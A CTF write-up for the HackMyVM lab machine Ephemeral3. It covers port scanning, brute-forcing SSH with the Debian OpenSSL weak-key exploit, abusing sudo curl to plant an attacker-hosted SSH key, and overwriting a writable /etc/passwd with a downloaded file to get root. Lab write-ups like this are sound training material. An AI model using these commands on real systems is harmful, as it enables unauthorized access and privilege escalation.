NOTES ABOUT Ephemeral3

[ 2022-10-09 ] [ HackMyVM / Ephemeral3 ]

Status: Rooted
Skills: Port Scanning, Fuzzing, OpenSSH Exploit, Openssl, Sudo
Tools: nmap, openssl, curl

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.21

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f0:f2:b8:e0:da:41:9b:96:3b:b6:2b:98:95:4c:67:60 (RSA)
| 256 a8:cd:e7:a7:0e:ce:62:86:35:96:02:43:9e:3e:9a:80 (ECDSA)
|_ 256 14:a7:57:a9:09:1a:7e:7e:ce:1e:91:f3:b1:1d:1b:fd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)

GETTING IN

$ gobuster -q dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.21 -x html,htm,php,txt,xml 
/agency (Status: 301) [Size: 307] [--> http://10.0.2.21/agency/]
/index.html (Status: 200) [Size: 10918]
/index.html (Status: 200) [Size: 10918]
/note.txt (Status: 200) [Size: 159]

$ curl 10.0.2.21/note.txt
Hey! I just generated your keys with OpenSSL. You should be able to use your private key now!

If you have any questions just email me at henry@ephemeral.com


$ searchsploit openssl ssh

OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py

$ searchsploit -m 5720.py

cat 5720.py
#!/bin/python
[...]
# 1. Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
# 2. Extract it to a directory
#
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
[...]

$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
$ tar -xvf 5622.tar.bz2

$ python2 ./5720.py ./rsa/2048 10.0.2.21 randy 22 5

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
Tested 27 keys | Remaining 32741 keys | Aprox. Speed 5/sec
[...]
Tested 10849 keys | Remaining 21919 keys | Aprox. Speed 7/sec

Key Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671
Execute: ssh -lrandy -p22 -i ./rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 10.0.2.21

Tested 10872 keys | Remaining 21896 keys | Aprox. Speed 4/sec


$ ssh -lrandy -p22 -i ./rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 10.0.2.21
randy@ephemeral:~$

ELEVATING PRIVILEGES

randy@ephemeral:~$ sudo -l
Matching Defaults entries for randy on ephemeral:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User randy may run the following commands on ephemeral:
(henry) NOPASSWD: /usr/bin/curl

GENERATE SSH KEYS TO DOWNLOAD:

$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/CTF/ephemeral/ssh/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/CTF/ephemeral/ssh/id_rsa
Your public key has been saved in /home/kali/CTF/ephemeral/ssh/id_rsa.pub
The key fingerprint is:
SHA256:FbUlH6GfM2CBQVHE4rnyGCV6NPllXmpragfJGToIRnE kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| ..E .=O* +. |
| .. o..B . |
| . o.o= . |
| o =.=.oo.. |
| . . +SB O o= |
| o * B + o |
| . * o . |
| . o + |
| ..+ |
+----[SHA256]-----+
'

$ cd /home/kali/CTF/ephemeral/ssh
$ python3 -m http.server

HENRY'S NEW AUTHORIZED KEY ;)

randy@ephemeral:~$ sudo -u henry /usr/bin/curl 10.0.2.15:8000/id_rsa.pub -o /home/henry/.ssh/authorized_keys
randy@ephemeral:~$ exit
randy@ephemeral:~$ ssh -i ./id_rsa henry@10.0.2.21

henry@ephemeral:~$

henry@ephemeral:~$ cat user.txt

ROOT WAY

henry@ephemeral:~$ find / -writable -xdev 2>/dev/null
[...]
/tmp/.font-unix
/etc/passwd
/etc/vmware-tools/locations.lck
/var/metrics
[...]
henry@ephemeral:~$ ls -la /etc/passwd
-rw-rw-r-- 1 root henry 2891 Jun 24 01:36 /etc/passwd

ON LOCAL MODIFIED FILE: CTF/ephemeral/passwd

$ openssl passwd -1 -salt root root
$1$root$9gr5KxwuEdiI80GtIzd.U0

$ cat CTF/ephemeral/ssh/passwd
root:$1$root$9gr5KxwuEdiI80GtIzd.U0:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]
$ python3 -m http.server

ON HENRY SHELL

henry@ephemeral:~$ /usr/bin/curl 10.0.2.15:8000/passwd -o /etc/passwd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2920 100 2920 0 0 85882 0 --:--:-- --:--:-- --:--:-- 88484

henry@ephemeral:~$ cat /etc/passwd
root:$1$root$9gr5KxwuEdiI80GtIzd.U0:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]
henry@ephemeral:~$ su root
Password: root
root@ephemeral:/home/henry#

root@ephemeral:/home/henry# cat /root/root.txt

root@ephemeral:/home/henry# init 0

--- Loaded 410 times ---